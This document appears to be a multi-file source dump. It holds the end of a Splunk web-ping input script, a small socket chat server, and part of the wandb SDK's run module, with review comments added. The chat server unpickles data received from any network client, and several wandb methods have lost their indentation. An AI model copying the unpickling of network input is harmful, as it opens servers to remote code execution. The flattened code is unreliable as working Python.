                                          error_threshold=error_threshold, return_headers=return_headers, fips_mode=ServerInfo.is_fips_mode(input_config.session_key))
                except NTLMAuthenticationValueException as e:
                    # NOTE(review): when this exception fires, 'result' is never
                    # assigned, so the output_result() call below would raise
                    # NameError — confirm whether this path should return early
                    self.logger.warn('NTLM authentication failed due to configuration issue stanza=%s, message="%s"', stanza, str(e))
                with self.lock:
                    # Send the event
                    self.output_result(result, stanza, title, host=host, index=index, source=source,
                                       sourcetype=sourcetype, unbroken=True, close=True,
                                       proxy_server=proxy_server, proxy_port=proxy_port,
                                       proxy_user=proxy_user, proxy_type=proxy_type)
                    # Get the time that the input last ran
                    last_ran = self.last_ran(input_config.checkpoint_dir, stanza)
                    # Save the checkpoint so that we remember when we last ran the input
                    self.save_checkpoint(input_config.checkpoint_dir, stanza,
                                         self.get_non_deviated_last_run(last_ran, interval, stanza))
            # Don't scan the URL if the URL is unencrypted and the host is on Cloud
            if self.is_on_cloud(input_config.session_key) and not url.scheme == "https":
                self.logger.warn("The URL will not be scanned because the host is running on Splunk Cloud and the URL isn't using encryption, url=%s", url.geturl())
            # NOTE(review): this branch tests the exact same condition as the one
            # above and is therefore unreachable dead code — confirm what the
            # intended SHC check was
            elif self.is_on_cloud(input_config.session_key) and not url.scheme == "https":
                self.logger.warn("The URL will not be scanned because the host is running on Splunk Cloud and the URL isn't using encryption, url=%s", url.geturl())
            # If this is not running in multi-threading mode, then run it now in the main thread
            elif self.thread_limit <= 1:
                run_ping()
            # If the number of threads is at or above the limit, then wait until the number of
            # threads comes down
            elif len(self.threads) >= self.thread_limit:
                self.logger.warn("Thread limit has been reached and thus this execution will be skipped for stanza=%s, thread_count=%i", stanza, len(self.threads))
            # Execute the input as a separate thread
            else:
                # Start a thread
                t = threading.Thread(name='web_ping:' + stanza, target=run_ping)
                self.threads[stanza] = t
                t.start()
                self.logger.info("Added thread to the queue for stanza=%s, thread_count=%i", stanza, len(self.threads))
# Script entry point: instantiate the modular input and run it
if __name__ == '__main__':
    web_ping = None
    try:
        web_ping = WebPing()
        web_ping.execute()
        sys.exit(0)
    except Exception as e:
        # This logs general exceptions that would have been unhandled otherwise (such as coding
        # errors)
        if web_ping is not None and web_ping.logger is not None:
            web_ping.logger.exception("Unhandled exception was caught, this may be due to a defect in the script")
        else:
            # No logger is available yet (construction failed), so let the exception propagate
            raise e
|
server.py
|
import socket
import pickle
import threading as th
# Empty host string binds the listening socket to all interfaces
host = ''
port = 4041
# Shared, module-level state mutated by the per-client handler threads.
# NOTE(review): these lists are accessed from multiple threads without a lock.
ids_jogadores = []   # ids of the players currently in the room
conections = []      # active socket connections
clientes = []        # (address, port) tuples of connected clients
threads = []         # one handler thread per accepted client
mensagens = []       # chat history as [id, message] pairs
def existeIDinServer(id, jogadores=None):
    """Return True if *id* already belongs to a registered player.

    Arguments:
    id -- the player id to look for
    jogadores -- the list of ids to search; defaults to the module-level
                 ids_jogadores list used by the server

    The original implementation returned from inside the loop on the very
    first iteration, so it only ever compared *id* against the first
    registered player; this version checks every entry.
    """
    if jogadores is None:
        jogadores = ids_jogadores
    return id in jogadores
def broadCastMensagens(con):
    """Send the full chat history to a single client connection.

    The payload mirrors the protocol used elsewhere in this server: a pickled
    dict with an "erro" status flag and the "mensagens" history list.
    """
    payload = {"erro": 0, "mensagens": mensagens}
    con.send(pickle.dumps(payload))
def lobbyClientServer(client, con):
    """Per-client handler thread: register the player, then relay chat messages.

    Arguments:
    client -- the (address, port) tuple returned by socket.accept()
    con -- the connected socket for this client
    """
    try:
        # Connection established
        print('Cliente conectado', client)
        # First message from the client is the pickled join request with its id
        dataJson = con.recv(1024)
        dataJson = pickle.loads(dataJson)
        # Reject duplicate ids and terminate this handler thread
        if existeIDinServer(dataJson['id']):
            r = {"erro": 1, "msg": "ID já existe na sala", "code": 1}
            con.send(pickle.dumps(r))
            exit()
        print(f'{dataJson["id"]} entrou na sala.')
        # Register the client in the shared module-level state
        conections.append(con)
        clientes.append(client)
        ids_jogadores.append(dataJson['id'])
        idClient = dataJson["id"]
        # Acknowledge the successful join
        r = {"erro": 0, "status": 1}
        con.send(pickle.dumps(r))
        # Main chat loop: push the history, then wait for the next message
        while True:
            try:
                broadCastMensagens(con)
                msg = con.recv(1024)
                if msg:
                    dataJson = pickle.loads(msg)
                    # if existeIDinServer(dataJson['id']) and dataJson['state'] == 3:
                    # print('({0})> {1}'.format(idClient, dataJson["msg"]))
                    # mensagens.append([idClient, dataJson['msg']])
                    print('({0})> {1}'.format(idClient, dataJson["msg"]))
                    mensagens.append([idClient, dataJson['msg']])
            except:
                # NOTE(review): bare except — any error (not just a dropped
                # connection) lands here and deregisters the client
                con.close()
                print(f'{idClient} Cliente foi desconectado...')
                ids_jogadores.remove(idClient)
                clientes.remove(client)
                conections.remove(con)
                exit()
    except:
        # NOTE(review): if the failure happens before the join completes,
        # idClient is unbound here and this f-string itself raises NameError
        print(f'Problema com o cliente {idClient}')
        exit()
# Server bootstrap: bind the listening socket and hand each accepted
# connection to its own lobbyClientServer thread.
print('Servidor iniciado...')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
orig = (host, port)
s.bind(orig)
# Backlog of 1 pending connection; accepted clients are served concurrently
s.listen(1)
while True:
    con, client = s.accept()
    new_th = th.Thread(target=lobbyClientServer, args=(client, con, ))
    new_th.start()
    # Keep a reference so the threads are not garbage collected
    threads.append(new_th)
|
wandb_run.py
|
import _thread as thread
import atexit
from collections.abc import Mapping
from datetime import timedelta
from enum import IntEnum
import glob
import json
import logging
import numbers
import os
import re
import sys
import threading
import time
import traceback
from types import TracebackType
from typing import (
Any,
Callable,
Dict,
List,
NamedTuple,
Optional,
Sequence,
TextIO,
Tuple,
Type,
Union,
)
from typing import TYPE_CHECKING
import requests
import wandb
from wandb import errors
from wandb import trigger
from wandb._globals import _datatypes_set_callback
from wandb.apis import internal, public
from wandb.apis.internal import Api
from wandb.apis.public import Api as PublicApi
from wandb.proto.wandb_internal_pb2 import (
MetricRecord,
PollExitResponse,
RunRecord,
)
from wandb.util import (
_is_artifact_string,
add_import_hook,
parse_artifact_string,
sentry_set_scope,
to_forward_slash_path,
)
from wandb.viz import (
create_custom_chart,
custom_chart_panel_config,
CustomChart,
Visualize,
)
from . import wandb_artifacts
from . import wandb_config
from . import wandb_metric
from . import wandb_summary
from .interface.artifacts import Artifact as ArtifactInterface
from .interface.interface import InterfaceBase
from .interface.summary_record import SummaryRecord
from .lib import (
config_util,
deprecate,
filenames,
filesystem,
ipython,
module,
proto_util,
redirect,
telemetry,
)
from .lib.exit_hooks import ExitHooks
from .lib.git import GitRepo
from .lib.printer import get_printer
from .lib.reporting import Reporter
from .wandb_artifacts import Artifact
from .wandb_settings import Settings, SettingsConsole
from .wandb_setup import _WandbSetup
if TYPE_CHECKING:
from .data_types import WBValue
from .wandb_alerts import AlertLevel
from .interface.artifacts import (
ArtifactEntry,
ArtifactManifest,
)
from .lib.printer import PrinterTerm, PrinterJupyter
from wandb.proto.wandb_internal_pb2 import (
CheckVersionResponse,
GetSummaryResponse,
SampledHistoryResponse,
)
# Module-level logger shared by the wandb SDK
logger = logging.getLogger("wandb")
# Seconds to wait during shutdown — presumably for the exit/teardown sequence
# to complete; confirm against the consumers of this constant
EXIT_TIMEOUT = 60
# Labels may only end with alphanumerics, underscores, and hyphens
RE_LABEL = re.compile(r"[a-zA-Z0-9_-]+$")
class TeardownStage(IntEnum):
    """Ordering bucket for teardown hooks (EARLY before LATE — presumably
    enforced by the teardown runner; not visible in this file chunk)."""
    EARLY = 1
    LATE = 2
class TeardownHook(NamedTuple):
    """A zero-argument callback paired with the teardown stage it belongs to."""

    call: Callable[[], None]  # the callback to invoke at teardown
    stage: TeardownStage  # which stage (EARLY or LATE) the callback belongs to
class RunStatusChecker(object):
    """Periodically polls the background process for relevant updates.

    For now, we just use this to figure out if the user has requested a stop.

    Two daemon threads are started on construction: one polls for a
    server-side stop request, the other polls for network/retry status.
    """

    def __init__(
        self,
        interface: InterfaceBase,
        stop_polling_interval: int = 15,
        retry_polling_interval: int = 5,
    ) -> None:
        # Interface to the background (internal) process.
        self._interface = interface
        # Poll cadence (seconds) for "should this run stop?" checks.
        self._stop_polling_interval = stop_polling_interval
        # Poll cadence (seconds) for network/retry status messages.
        self._retry_polling_interval = retry_polling_interval
        # Set by stop()/join(); both poller threads exit once set.
        self._join_event = threading.Event()
        self._stop_thread = threading.Thread(target=self.check_status)
        self._stop_thread.name = "ChkStopThr"
        self._stop_thread.daemon = True
        self._stop_thread.start()
        self._retry_thread = threading.Thread(target=self.check_network_status)
        self._retry_thread.name = "NetStatThr"
        self._retry_thread.daemon = True
        self._retry_thread.start()

    def check_network_status(self) -> None:
        # Poll loop: surface HTTP retry/status messages to the terminal until
        # the join event is set.
        join_requested = False
        while not join_requested:
            status_response = self._interface.communicate_network_status()
            if status_response and status_response.network_responses:
                for hr in status_response.network_responses:
                    if (
                        hr.http_status_code == 200 or hr.http_status_code == 0
                    ):  # we use 0 for non-http errors (eg wandb errors)
                        wandb.termlog("{}".format(hr.http_response_text))
                    else:
                        wandb.termlog(
                            "{} encountered ({}), retrying request".format(
                                hr.http_status_code, hr.http_response_text.rstrip()
                            )
                        )
            # wait() doubles as the sleep; returns True once join is requested.
            join_requested = self._join_event.wait(self._retry_polling_interval)

    def check_status(self) -> None:
        # Poll loop: if the server says the run should stop, interrupt the
        # main thread (KeyboardInterrupt) unless a pyagent is running.
        join_requested = False
        while not join_requested:
            status_response = self._interface.communicate_stop_status()
            if status_response and status_response.run_should_stop:
                # TODO(frz): This check is required
                # until WB-3606 is resolved on server side.
                if not wandb.agents.pyagent.is_running():
                    # NOTE(review): `thread` must be the `_thread` module
                    # (import _thread as thread); without that import this
                    # line raises NameError instead of interrupting.
                    thread.interrupt_main()
                    return
            join_requested = self._join_event.wait(self._stop_polling_interval)

    def stop(self) -> None:
        # Signal both poll loops to exit.
        self._join_event.set()

    def join(self) -> None:
        # Stop polling and wait for both threads to finish.
        self.stop()
        self._stop_thread.join()
        self._retry_thread.join()
class Run:
"""A unit of computation logged by wandb. Typically this is an ML experiment.
Create a run with `wandb.init()`:
<!--yeadoc-test:run-object-basic-->
```python
import wandb
run = wandb.init()
```
There is only ever at most one active `wandb.Run` in any process,
and it is accessible as `wandb.run`:
<!--yeadoc-test:global-run-object-->
```python
import wandb
assert wandb.run is None
wandb.init()
assert wandb.run is not None
```
anything you log with `wandb.log` will be sent to that run.
If you want to start more runs in the same script or notebook, you'll need to
finish the run that is in-flight. Runs can be finished with `wandb.finish` or
by using them in a `with` block:
<!--yeadoc-test:run-context-manager-->
```python
import wandb
wandb.init()
wandb.finish()
assert wandb.run is None
with wandb.init() as run:
pass # log data here
assert wandb.run is None
```
See the documentation for `wandb.init` for more on creating runs, or check out
[our guide to `wandb.init`](https://docs.wandb.ai/guides/track/launch).
In distributed training, you can either create a single run in the rank 0 process
and then log information only from that process or you can create a run in each process,
logging from each separately, and group the results together with the `group` argument
to `wandb.init`. For more details on distributed training with W&B, check out
[our guide](https://docs.wandb.ai/guides/track/advanced/distributed-training).
Currently there is a parallel `Run` object in the `wandb.Api`. Eventually these
two objects will be merged.
Attributes:
history: (History) Time series values, created with `wandb.log()`.
History can contain scalar values, rich media, or even custom plots
across multiple steps.
summary: (Summary) Single values set for each `wandb.log()` key. By
default, summary is set to the last value logged. You can manually
set summary to the best value, like max accuracy, instead of the
final value.
"""
_telemetry_obj: telemetry.TelemetryRecord
_telemetry_obj_active: bool
_telemetry_obj_dirty: bool
_telemetry_obj_flushed: bytes
_teardown_hooks: List[TeardownHook]
_tags: Optional[Tuple[Any, ...]]
_entity: Optional[str]
_project: Optional[str]
_group: Optional[str]
_job_type: Optional[str]
_name: Optional[str]
_notes: Optional[str]
_run_obj: Optional[RunRecord]
_run_obj_offline: Optional[RunRecord]
# Use string literal annotation because of type reference loop
_backend: Optional["wandb.sdk.backend.backend.Backend"]
_internal_run_interface: Optional[
Union[
"wandb.sdk.interface.interface_queue.InterfaceQueue",
"wandb.sdk.interface.interface_grpc.InterfaceGrpc",
]
]
_wl: Optional[_WandbSetup]
_out_redir: Optional[redirect.RedirectBase]
_err_redir: Optional[redirect.RedirectBase]
_redirect_cb: Optional[Callable[[str, str], None]]
_output_writer: Optional["filesystem.CRDedupedFile"]
_quiet: Optional[bool]
_atexit_cleanup_called: bool
_hooks: Optional[ExitHooks]
_exit_code: Optional[int]
_run_status_checker: Optional[RunStatusChecker]
_check_version: Optional["CheckVersionResponse"]
_sampled_history: Optional["SampledHistoryResponse"]
_final_summary: Optional["GetSummaryResponse"]
_poll_exit_response: Optional[PollExitResponse]
_use_redirect: bool
_stdout_slave_fd: Optional[int]
_stderr_slave_fd: Optional[int]
_artifact_slots: List[str]
_init_pid: int
_iface_pid: Optional[int]
_iface_port: Optional[int]
_attach_id: Optional[str]
_settings: Settings
    def __init__(
        self,
        settings: Settings,
        config: Optional[Dict[str, Any]] = None,
        sweep_config: Optional[Dict[str, Any]] = None,
    ) -> None:
        """Initialize run state from settings, user config, and sweep config.

        Args:
            settings: Run settings produced by wandb setup/init.
            config: Optional initial user config values.
            sweep_config: Optional config values locked by an active sweep.
        """
        # Config object with callbacks wired back into this run.
        self._config = wandb_config.Config()
        self._config._set_callback(self._config_callback)
        self._config._set_artifact_callback(self._config_artifact_callback)
        self._config._set_settings(settings)
        self._backend = None
        self._internal_run_interface = None
        self.summary = wandb_summary.Summary(
            self._summary_get_current_summary_callback,
        )
        self.summary._set_update_callback(self._summary_update_callback)
        self.history_step = 0
        self._torch_history: Optional["wandb.wandb_torch.TorchHistory"] = None
        _datatypes_set_callback(self._datatypes_callback)
        self._settings = settings
        self._printer = get_printer(settings._jupyter)
        self._wl = None
        self._reporter: Optional[Reporter] = None
        # Run metadata; filled in from settings below and/or from the backend
        # RunRecord later (_set_run_obj).
        self._entity = None
        self._project = None
        self._group = None
        self._job_type = None
        self._run_id = settings.run_id
        self._start_time = time.time()
        self._starting_step = 0
        self._name = None
        self._notes = None
        self._tags = None
        self._remote_url = None
        self._last_commit = None
        self._hooks = None
        self._teardown_hooks = []
        # Console redirection state (configured when the run starts).
        self._redirect_cb = None
        self._out_redir = None
        self._err_redir = None
        self.stdout_redirector = None
        self.stderr_redirector = None
        self._save_stdout = None
        self._save_stderr = None
        self._stdout_slave_fd = None
        self._stderr_slave_fd = None
        self._exit_code = None
        self._exit_result = None
        self._quiet = self._settings.quiet
        self._output_writer = None
        self._upgraded_version_message = None
        self._deleted_version_message = None
        self._yanked_version_message = None
        self._used_artifact_slots: Dict[str, str] = {}
        # Returned from backend request_run(), set from wandb_init?
        self._run_obj = None
        self._run_obj_offline = None
        # Created when the run "starts".
        self._run_status_checker = None
        self._check_version = None
        self._sampled_history = None
        self._final_summary = None
        self._poll_exit_response = None
        # Initialize telemetry object
        self._telemetry_obj = telemetry.TelemetryRecord()
        self._telemetry_obj_active = False
        self._telemetry_obj_flushed = b""
        self._telemetry_obj_dirty = False
        self._atexit_cleanup_called = False
        self._use_redirect = True
        # Pull info from settings
        self._init_from_settings(settings)
        # Initial scope setup for sentry. This might get changed when the
        # actual run comes back.
        sentry_set_scope(
            settings_dict=self._settings, process_context="user",
        )
        # Populate config
        config = config or dict()
        wandb_key = "_wandb"
        config.setdefault(wandb_key, dict())
        self._launch_artifact_mapping: Dict[str, Any] = {}
        self._unique_launch_artifact_sequence_names: Dict[str, Any] = {}
        if settings.save_code and settings.program_relpath:
            config[wandb_key]["code_path"] = to_forward_slash_path(
                os.path.join("code", settings.program_relpath)
            )
        if sweep_config:
            self._config.update_locked(
                sweep_config, user="sweep", _allow_val_change=True
            )
        # Launch support: read artifact/config overrides from the launch
        # config file, if one was provided and exists.
        if (
            self._settings.launch
            and self._settings.launch_config_path
            and os.path.exists(self._settings.launch_config_path)
        ):
            self.save(self._settings.launch_config_path)
            with open(self._settings.launch_config_path) as fp:
                launch_config = json.loads(fp.read())
            if launch_config.get("overrides", {}).get("artifacts") is not None:
                for key, item in (
                    launch_config.get("overrides").get("artifacts").items()
                ):
                    self._launch_artifact_mapping[key] = item
                    artifact_sequence_tuple_or_slot = key.split(":")
                    if len(artifact_sequence_tuple_or_slot) == 2:
                        sequence_name = artifact_sequence_tuple_or_slot[0].split("/")[
                            -1
                        ]
                        # Track sequence names that appear exactly once; a
                        # second occurrence removes the entry.
                        if self._unique_launch_artifact_sequence_names.get(
                            sequence_name
                        ):
                            self._unique_launch_artifact_sequence_names.pop(
                                sequence_name
                            )
                        else:
                            self._unique_launch_artifact_sequence_names[
                                sequence_name
                            ] = item
            launch_run_config = launch_config.get("overrides", {}).get("run_config")
            if launch_run_config:
                self._config.update_locked(
                    launch_run_config, user="launch", _allow_val_change=True
                )
        self._config._update(config, ignore_locked=True)
        # pid is set so we know if this run object was initialized by this process
        self._init_pid = os.getpid()
        # interface pid and port configured when backend is configured (See _hack_set_run)
        # TODO: using pid isnt the best for windows as pid reuse can happen more often than unix
        self._iface_pid = None
        self._iface_port = None
        self._attach_id = None
        # for now, use runid as attach id, this could/should be versioned in the future
        if self._settings._require_service:
            self._attach_id = self._settings.run_id
    def _set_iface_pid(self, iface_pid: int) -> None:
        # Record the pid of the interface/service process (set when the
        # backend is configured).
        self._iface_pid = iface_pid
    def _set_iface_port(self, iface_port: int) -> None:
        # Record the port of the interface/service process (set when the
        # backend is configured).
        self._iface_port = iface_port
    def _telemetry_callback(self, telem_obj: telemetry.TelemetryRecord) -> None:
        # Merge incoming telemetry into the run's record, mark it dirty, and
        # attempt an immediate flush to the backend.
        self._telemetry_obj.MergeFrom(telem_obj)
        self._telemetry_obj_dirty = True
        self._telemetry_flush()
    def _telemetry_flush(self) -> None:
        # Publish the telemetry proto to the backend, but only when telemetry
        # is active, something changed, and the serialized bytes differ from
        # what was last flushed (avoids redundant publishes).
        if not self._telemetry_obj_active:
            return
        if not self._telemetry_obj_dirty:
            return
        if self._backend and self._backend.interface:
            serialized = self._telemetry_obj.SerializeToString()
            if serialized == self._telemetry_obj_flushed:
                return
            self._backend.interface._publish_telemetry(self._telemetry_obj)
            self._telemetry_obj_flushed = serialized
            self._telemetry_obj_dirty = False
    def _freeze(self) -> None:
        # After this, __setattr__ rejects attribute names that don't already
        # exist on the instance.
        self._frozen = True
def __setattr__(self, attr: str, value: object) -> None:
if getattr(self, "_frozen", None) and not hasattr(self, attr):
raise Exception("Attribute {} is not supported on Run object.".format(attr))
super(Run, self).__setattr__(attr, value)
def _telemetry_imports(self, imp: telemetry.TelemetryImports) -> None:
telem_map = dict(
pytorch_ignite="ignite", transformers_huggingface="transformers",
)
# calculate mod_map, a mapping from module_name to telem_name
mod_map = dict()
for desc in imp.DESCRIPTOR.fields:
if desc.type != desc.TYPE_BOOL:
continue
telem_name = desc.name
mod_name = telem_map.get(telem_name, telem_name)
mod_map[mod_name] = telem_name
# set telemetry field for every module loaded that we track
mods_set = set(sys.modules)
for mod in mods_set.intersection(mod_map):
setattr(imp, mod_map[mod], True)
    def _update_settings(self, settings: Settings) -> None:
        # Swap in a new settings object and re-derive run metadata from it.
        self._settings = settings
        self._init_from_settings(settings)
def _init_from_settings(self, settings: Settings) -> None:
if settings.entity is not None:
self._entity = settings.entity
if settings.project is not None:
self._project = settings.project
if settings.run_group is not None:
self._group = settings.run_group
if settings.run_job_type is not None:
self._job_type = settings.run_job_type
if settings.run_name is not None:
self._name = settings.run_name
if settings.run_notes is not None:
self._notes = settings.run_notes
if settings.run_tags is not None:
self._tags = settings.run_tags
    def _make_proto_run(self, run: RunRecord) -> None:
        """Populate protocol buffer RunData for interface/interface.

        Copies every locally-known, non-None field onto the proto in place.
        """
        if self._entity is not None:
            run.entity = self._entity
        if self._project is not None:
            run.project = self._project
        if self._group is not None:
            run.run_group = self._group
        if self._job_type is not None:
            run.job_type = self._job_type
        if self._run_id is not None:
            run.run_id = self._run_id
        if self._name is not None:
            run.display_name = self._name
        if self._notes is not None:
            run.notes = self._notes
        if self._tags is not None:
            for tag in self._tags:
                run.tags.append(tag)
        if self._start_time is not None:
            # Proto stores whole seconds; fractional start time is truncated.
            run.start_time.FromSeconds(int(self._start_time))
        if self._remote_url is not None:
            run.git.remote_url = self._remote_url
        if self._last_commit is not None:
            run.git.last_commit = self._last_commit
        # Note: run.config is set in interface/interface:_make_run()
    def _populate_git_info(self) -> None:
        """Best-effort: read remote url and last commit from the local git repo."""
        try:
            # NOTE(review): lazy=False presumably forces immediate repo
            # discovery so failures surface here — confirm in .lib.git.
            repo = GitRepo(remote=self._settings.git_remote, lazy=False)
        except Exception:
            wandb.termwarn("Cannot find valid git repo associated with this directory.")
            return
        self._remote_url, self._last_commit = repo.remote_url, repo.last_commit
def __getstate__(self) -> Any:
"""Custom pickler."""
# We only pickle in service mode
if not self._settings or not self._settings._require_service:
return
_attach_id = self._attach_id
if not _attach_id:
return
return dict(_attach_id=_attach_id)
def __setstate__(self, state: Any) -> None:
"""Custom unpickler."""
if not state:
return
_attach_id = state.get("_attach_id")
if not _attach_id:
return
self._attach_id = _attach_id
    @property
    def _torch(self) -> "wandb.wandb_torch.TorchHistory":
        # Lazily create the TorchHistory helper on first access.
        if self._torch_history is None:
            self._torch_history = wandb.wandb_torch.TorchHistory()
        return self._torch_history
    @property
    def settings(self) -> Settings:
        """Returns a frozen copy of run's Settings object."""
        # Copy then freeze so callers can't mutate the run's live settings.
        cp = self._settings.copy()
        cp.freeze()
        return cp
    @property
    def dir(self) -> str:
        """Returns the directory where files associated with the run are saved."""
        # Backed by settings.files_dir.
        return self._settings.files_dir
    @property
    def config(self) -> wandb_config.Config:
        """Returns the config object associated with this run."""
        # The live, mutable Config (callbacks wired in __init__).
        return self._config
    @property
    def config_static(self) -> wandb_config.ConfigStatic:
        # Static (ConfigStatic) wrapper around the live config — see wandb_config.
        return wandb_config.ConfigStatic(self._config)
@property
def name(self) -> Optional[str]:
"""Returns the display name of the run.
Display names are not guaranteed to be unique and may be descriptive.
By default, they are randomly generated.
"""
if self._name:
return self._name
if not self._run_obj:
return None
return self._run_obj.display_name
    @name.setter
    def name(self, name: str) -> None:
        # Record the feature in telemetry, store locally, and publish the
        # updated run record to the backend if one is attached.
        with telemetry.context(run=self) as tel:
            tel.feature.set_run_name = True
        self._name = name
        if self._backend and self._backend.interface:
            self._backend.interface.publish_run(self)
@property
def notes(self) -> Optional[str]:
"""Returns the notes associated with the run, if there are any.
Notes can be a multiline string and can also use markdown and latex equations
inside `$$`, like `$x + 3$`.
"""
if self._notes:
return self._notes
if not self._run_obj:
return None
return self._run_obj.notes
    @notes.setter
    def notes(self, notes: str) -> None:
        # Store locally and publish the updated run record to the backend.
        self._notes = notes
        if self._backend and self._backend.interface:
            self._backend.interface.publish_run(self)
@property
def tags(self) -> Optional[Tuple]:
"""Returns the tags associated with the run, if there are any."""
if self._tags:
return self._tags
run_obj = self._run_obj or self._run_obj_offline
if run_obj:
return tuple(run_obj.tags)
return None
    @tags.setter
    def tags(self, tags: Sequence) -> None:
        # Record the feature in telemetry, store a tuple copy locally, and
        # publish the updated run record to the backend if one is attached.
        with telemetry.context(run=self) as tel:
            tel.feature.set_run_tags = True
        self._tags = tuple(tags)
        if self._backend and self._backend.interface:
            self._backend.interface.publish_run(self)
    @property
    def id(self) -> str:
        """Returns the identifier for this run."""
        if TYPE_CHECKING:
            # Static-only narrowing for mypy; run_id is assigned in __init__.
            assert self._run_id is not None
        return self._run_id
@property
def sweep_id(self) -> Optional[str]:
"""Returns the ID of the sweep associated with the run, if there is one."""
if not self._run_obj:
return None
return self._run_obj.sweep_id or None
@property
def path(self) -> str:
"""Returns the path to the run.
Run paths include entity, project, and run ID, in the format
`entity/project/run_id`.
"""
parts = []
for e in [self._entity, self._project, self._run_id]:
if e is not None:
parts.append(e)
return "/".join(parts)
@property
def start_time(self) -> float:
"""Returns the unix time stamp, in seconds, when the run started."""
if not self._run_obj:
return self._start_time
else:
return self._run_obj.start_time.ToSeconds()
@property
def starting_step(self) -> int:
"""Returns the first step of the run."""
if not self._run_obj:
return self._starting_step
else:
return self._run_obj.starting_step
@property
def resumed(self) -> bool:
"""Returns True if the run was resumed, False otherwise."""
if self._run_obj:
return self._run_obj.resumed
return False
    @property
    def step(self) -> int:
        """Returns the current value of the step.

        This counter is incremented by `wandb.log`.
        """
        # history_step is advanced by _log() on commit.
        return self.history_step
def project_name(self) -> str:
run_obj = self._run_obj or self._run_obj_offline
return run_obj.project if run_obj else ""
    @property
    def mode(self) -> str:
        """For compatibility with `0.9.x` and earlier, deprecate eventually."""
        # Emits a deprecation warning on every access.
        deprecate.deprecate(
            field_name=deprecate.Deprecated.run__mode,
            warning_message=(
                "The mode property of wandb.run is deprecated "
                "and will be removed in a future release."
            ),
        )
        return "dryrun" if self._settings._offline else "run"
    @property
    def offline(self) -> bool:
        """True when the run is in offline mode (no server syncing)."""
        return self._settings._offline
    @property
    def disabled(self) -> bool:
        """True when the run is a no-op (disabled mode)."""
        return self._settings._noop
@property
def group(self) -> str:
"""Returns the name of the group associated with the run.
Setting a group helps the W&B UI organize runs in a sensible way.
If you are doing a distributed training you should give all of the
runs in the training the same group.
If you are doing crossvalidation you should give all the crossvalidation
folds the same group.
"""
run_obj = self._run_obj or self._run_obj_offline
return run_obj.run_group if run_obj else ""
@property
def job_type(self) -> str:
run_obj = self._run_obj or self._run_obj_offline
return run_obj.job_type if run_obj else ""
    @property
    def project(self) -> str:
        """Returns the name of the W&B project associated with the run."""
        # Delegates to project_name(), which consults the run record.
        return self.project_name()
    def log_code(
        self,
        root: str = ".",
        name: str = None,
        include_fn: Callable[[str], bool] = lambda path: path.endswith(".py"),
        exclude_fn: Callable[[str], bool] = filenames.exclude_wandb_fn,
    ) -> Optional[Artifact]:
        """Saves the current state of your code to a W&B Artifact.

        By default it walks the current directory and logs all files that end with `.py`.

        Arguments:
            root: The relative (to `os.getcwd()`) or absolute path to recursively find code from.
            name: (str, optional) The name of our code artifact. By default we'll name
                the artifact `source-$RUN_ID`. There may be scenarios where you want
                many runs to share the same artifact. Specifying name allows you to achieve that.
            include_fn: A callable that accepts a file path and
                returns True when it should be included and False otherwise. This
                defaults to: `lambda path: path.endswith(".py")`
            exclude_fn: A callable that accepts a file path and returns `True` when it should be
                excluded and `False` otherwise. This defaults to
                `filenames.exclude_wandb_fn`.

        Examples:
            Basic usage
            ```python
            run.log_code()
            ```

            Advanced usage
            ```python
            run.log_code("../", include_fn=lambda path: path.endswith(".py") or path.endswith(".ipynb"))
            ```

        Returns:
            An `Artifact` object if code was logged
        """
        name = name or "{}-{}".format("source", self.id)
        art = wandb.Artifact(name, "code")
        files_added = False
        if root is not None:
            root = os.path.abspath(root)
            for file_path in filenames.filtered_dir(root, include_fn, exclude_fn):
                files_added = True
                # Store each file relative to the scan root.
                save_name = os.path.relpath(file_path, root)
                art.add_file(file_path, name=save_name)
        # Add any manually staged files such is ipynb notebooks
        for dirpath, _, files in os.walk(self._settings._tmp_code_dir):
            for fname in files:
                file_path = os.path.join(dirpath, fname)
                save_name = os.path.relpath(file_path, self._settings._tmp_code_dir)
                files_added = True
                art.add_file(file_path, name=save_name)
        # Nothing matched — don't log an empty artifact.
        if not files_added:
            return None
        return self.log_artifact(art)
def get_url(self) -> Optional[str]:
"""Returns the url for the W&B run, if there is one.
Offline runs will not have a url.
"""
if self._settings._offline:
wandb.termwarn("URL not available in offline run")
return None
return self._settings.run_url
def get_project_url(self) -> Optional[str]:
"""Returns the url for the W&B project associated with the run, if there is one.
Offline runs will not have a project url.
"""
if self._settings._offline:
wandb.termwarn("URL not available in offline run")
return None
return self._settings.project_url
def get_sweep_url(self) -> Optional[str]:
"""Returns the url for the sweep associated with the run, if there is one."""
if self._settings._offline:
wandb.termwarn("URL not available in offline run")
return None
return self._settings.sweep_url
    @property
    def url(self) -> Optional[str]:
        """Returns the W&B url associated with the run."""
        # Property alias for get_url(); None for offline runs.
        return self.get_url()
    @property
    def entity(self) -> str:
        """Returns the name of the W&B entity associated with the run.

        Entity can be a user name or the name of a team or organization.
        """
        # Empty string (not None) when the entity hasn't been resolved yet.
        return self._entity or ""
def _label_internal(
self, code: str = None, repo: str = None, code_version: str = None
) -> None:
with telemetry.context(run=self) as tel:
if code and RE_LABEL.match(code):
tel.label.code_string = code
if repo and RE_LABEL.match(repo):
tel.label.repo_string = repo
if code_version and RE_LABEL.match(code_version):
tel.label.code_version = code_version
    def _label(
        self,
        code: str = None,
        repo: str = None,
        code_version: str = None,
        **kwargs: str,
    ) -> None:
        """Warn about invalid/unsupported labels, then record the valid ones.

        Invalid values are warned about here and filtered again by
        _label_internal; unknown keyword labels are warned about and dropped.
        """
        if self._settings.label_disable:
            return
        for k, v in (("code", code), ("repo", repo), ("code_version", code_version)):
            if v and not RE_LABEL.match(v):
                wandb.termwarn(
                    "Label added for '{}' with invalid identifier '{}' (ignored).".format(
                        k, v
                    ),
                    repeat=False,
                )
        for v in kwargs:
            wandb.termwarn(
                "Label added for unsupported key '{}' (ignored).".format(v),
                repeat=False,
            )

        self._label_internal(code=code, repo=repo, code_version=code_version)

        # update telemetry in the backend immediately for _label() callers
        self._telemetry_flush()
def _label_probe_lines(self, lines: List[str]) -> None:
if not lines:
return
parsed = telemetry._parse_label_lines(lines)
if not parsed:
return
label_dict = {}
code = parsed.get("code") or parsed.get("c")
if code:
label_dict["code"] = code
repo = parsed.get("repo") or parsed.get("r")
if repo:
label_dict["repo"] = repo
code_ver = parsed.get("version") or parsed.get("v")
if code_ver:
label_dict["code_version"] = code_ver
self._label_internal(**label_dict)
def _label_probe_main(self) -> None:
m = sys.modules.get("__main__")
if not m:
return
doc = getattr(m, "__doc__", None)
if not doc:
return
doclines = doc.splitlines()
